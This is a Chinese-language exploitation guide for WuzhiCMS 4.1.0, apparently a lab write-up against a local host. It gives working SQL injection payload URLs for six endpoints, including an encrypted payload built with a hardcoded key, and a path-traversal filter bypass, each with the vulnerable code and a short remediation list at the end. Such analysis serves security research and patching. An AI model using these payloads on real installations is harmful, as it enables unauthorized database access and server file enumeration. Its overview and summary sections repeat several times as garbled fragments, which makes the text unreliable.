五指CMS 4.1.0漏洞分析与利用指南<\/h1>

0x00 漏洞概述<\/h2>
五指CMS 4.1.0版本存在多个安全漏洞，包括6个SQL注入漏洞和1个文件遍历漏洞。这些漏洞主要由于输入验证不严格和过滤不彻底导致，攻击者可利用这些漏洞获取数据库敏感信息或遍历服务器文件系统。<\/p>

0x01 SQL注入漏洞分析<\/h2>

1. 第一个SQL注入漏洞<\/h3>

漏洞位置<\/strong>: \/wuzhicms\/www\/api\/uc.php<\/code><\/p>

漏洞原因<\/strong>: 获取到code参数后，先进行_authcode<\/code>解密，然后通过parse_str<\/code>函数解析，将结果存入$get<\/code>数组，最后将数组中的username<\/code>直接拼接到SQL查询中，无任何过滤。<\/p>

利用步骤<\/strong>:<\/p>

构造payload:<\/li> <\/ol> $payload =<\/span> 'time='<\/span>.<\/span>time<\/span>().<\/span>'&action=synlogin&username=aa" and extractvalue(1,concat(0x7e,user()))#'<\/span>; <\/span><\/span><\/code><\/pre> 使用_authcode<\/code>函数加密payload:<\/li> <\/ol> $code =<\/span> urlencode<\/span>(_authcode<\/span>($payload, 'encode'<\/span>, 'e063rbkHX22RAvIg'<\/span>)); <\/span><\/span><\/code><\/pre> 发送请求:<\/li> <\/ol> http:\/\/127.0.0.1\/wuzhicms\/api\/uc.php?code=[生成的code值] <\/code><\/pre> 关键代码分析<\/strong>:<\/p> \/\/ api\/uc.php 30-37行 <\/span><\/span><\/span><\/span>$code =<\/span> isset<\/span>($GLOBALS['code'<\/span>]) ?<\/span> $GLOBALS['code'<\/span>] :<\/span> ''<\/span>; <\/span><\/span>$get =<\/span> $GLOBALS; <\/span><\/span>parse_str<\/span>(_authcode<\/span>($code, 'DECODE'<\/span>, UC_KEY<\/span>), $get); <\/span><\/span> <\/span><\/span>\/\/ api\/uc.php 90行 synlogin函数 <\/span><\/span><\/span><\/span>$username =<\/span> $get['username'<\/span>]; <\/span><\/span>$sql =<\/span> "SELECT * FROM "<\/span>.<\/span>DB_PREFIX<\/span>.<\/span>"member WHERE username='<\/span>$username<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>2. 第二个SQL注入漏洞<\/h3> 漏洞位置<\/strong>: \/wuzhicms\/coreframe\/app\/promote\/admin\/index.php<\/code><\/p> payload<\/strong>:<\/p> http:\/\/127.0.0.1\/wuzhicms\/index.php?m=promote&f=index&v=search&_su=wuzhicms&&fieldtype=place&keywords=1111' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+ <\/code><\/pre> 漏洞原因<\/strong>: keywords<\/code>参数仅过滤了%20<\/code>和%27<\/code>，其他字符未过滤，直接拼接到SQL语句中。<\/p> 关键代码<\/strong>:<\/p> \/\/ promote\/admin\/index.php search函数 <\/span><\/span><\/span><\/span>$keywords =<\/span> str_replace<\/span>(array<\/span>('%20'<\/span>,'%27'<\/span>),''<\/span>,strip_tags<\/span>($keywords)); <\/span><\/span>$where .=<\/span> " AND `<\/span>$fieldtype<\/span>` LIKE '%<\/span>$keywords<\/span>%'"<\/span>; <\/span><\/span><\/code><\/pre>其他SQL注入漏洞<\/h3> 漏洞3-6与漏洞2原理相似，都是由于用户输入未充分过滤直接拼接到SQL语句中：<\/p> payload<\/strong>:<\/li> <\/ol> http:\/\/127.0.0.1\/wuzhicms\/index.php?m=coupon&f=card&v=detail_listing&groupname=a' and updatexml(rand(),CONCAT(0x7e,USER()),1)=' --+&_su=wuzhicms <\/code><\/pre> payload<\/strong>:<\/li> <\/ol> http:\/\/127.0.0.1\/wuzhicms\/index.php?m=pay&f=index&v=listing&keytype=0&_su=wuzhicms&keyValue='+and+updatexml(7,concat(0x7e,user(),0x7e),7)%23 <\/code><\/pre> payload<\/strong>:<\/li> <\/ol> http:\/\/127.0.0.1\/wuzhicms\/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&keywords=%27+and+updatexml(7,concat(0x7e,(user()),0x7e),7)%23 <\/code><\/pre> payload<\/strong>:<\/li> <\/ol> http:\/\/127.0.0.1\/wuzhicms\/index.php?m=order&f=goods&v=listing&_su=wuzhicms&keywords='and+extractvalue(1,concat(0x7e,user()))%23 <\/code><\/pre> 0x02 文件遍历漏洞分析<\/h2> 漏洞位置<\/strong>: \/wuzhicms\/coreframe\/app\/template\/admin\/index.php<\/code><\/p> payload<\/strong>:<\/p> http:\/\/127.0.0.1\/wuzhicms\/index.php?dir=\/.....\/\/\/.....\/\/\/.....\/\/\/.....\/\/\/&m=template&f=index&v=listing&_su=wuzhicms <\/code><\/pre> 漏洞原因<\/strong>: dir<\/code>参数过滤不彻底，通过构造特殊字符串可绕过过滤。<\/p> 过滤逻辑<\/strong>:<\/p> \/\/ template\/admin\/index.php 构造函数 <\/span><\/span><\/span><\/span>$this-><\/span>dir<\/span> =<\/span> isset<\/span>($GLOBALS['dir'<\/span>]) &&<\/span> trim<\/span>($GLOBALS['dir'<\/span>]) ?<\/span> <\/span><\/span> str_replace<\/span>(array<\/span>('..\\'<\/span>, '..\/'<\/span>, '.\/'<\/span>, '.\\'<\/span>), ''<\/span>, trim<\/span>($GLOBALS['dir'<\/span>])) :<\/span> ''<\/span>; <\/span><\/span><\/code><\/pre>绕过原理<\/strong>:<\/p> 输入\/.....\/<\/code>，过滤..\/<\/code>后剩下\/...\/<\/code><\/li> 再过滤.\/<\/code>后剩下\/..\/<\/code>，实现目录遍历<\/li> <\/ol> 利用代码<\/strong>:<\/p> \/\/ template\/admin\/index.php listing函数 <\/span><\/span><\/span><\/span>$dir =<\/span> $this-><\/span>dir<\/span>; <\/span><\/span>$lists =<\/span> glob<\/span>(TPL_ROOT<\/span>.<\/span>$dir.<\/span>'\/'<\/span>.<\/span>'*'<\/span>); \/\/ 直接使用用户输入的dir参数 <\/span><\/span><\/span><\/code><\/pre>0x03 漏洞修复建议<\/h2> SQL注入修复<\/strong>:<\/p> 使用预处理语句(PDO或mysqli)<\/li> 对所有用户输入进行严格过滤和转义<\/li> 最小权限原则，数据库用户只赋予必要权限<\/li> <\/ul> <\/li> 文件遍历修复<\/strong>:<\/p> 严格限制目录访问范围<\/li> 使用白名单方式验证输入<\/li> 添加目录访问权限检查<\/li> <\/ul> <\/li> 通用建议<\/strong>:<\/p> 更新到最新版本<\/li> 部署WAF防护<\/li> 定期进行安全审计<\/li> <\/ul> <\/li> <\/ol> 0x04 总结<\/h2> 五指CMS 4.1.0版本存在多处严重安全漏洞，攻击者可在未授权或低权限情况下获取数据库敏感信息或遍历服务器文件系统。开发人员应重视输入验证和过滤，避免直接拼接用户输入到敏感操作中。<\/p>

五指CMS 4.1.0漏洞分析与利用指南<\/h1>

0x00 漏洞概述<\/h2> 五指CMS 4.1.0版本存在多个安全漏洞，包括6个SQL注入漏洞和1个文件遍历漏洞。这些漏洞主要由于输入验证不严格和过滤不彻底导致，攻击者可利用这些漏洞获取数据库敏感信息或遍历服务器文件系统。<\/p>

0x01 SQL注入漏洞分析<\/h2>

0x04 总结<\/h2> 五指CMS 4.1.0版本存在多处严重安全漏洞，攻击者可在未授权或低权限情况下获取数据库敏感信息或遍历服务器文件系统。开发人员应重视输入验证和过滤，避免直接拼接用户输入到敏感操作中。<\/p>

0x00 漏洞概述<\/h2>
五指CMS 4.1.0版本存在多个安全漏洞，包括6个SQL注入漏洞和1个文件遍历漏洞。这些漏洞主要由于输入验证不严格和过滤不彻底导致，攻击者可利用这些漏洞获取数据库敏感信息或遍历服务器文件系统。<\/p>

0x04 总结<\/h2>
五指CMS 4.1.0版本存在多处严重安全漏洞，攻击者可在未授权或低权限情况下获取数据库敏感信息或遍历服务器文件系统。开发人员应重视输入验证和过滤，避免直接拼接用户输入到敏感操作中。<\/p>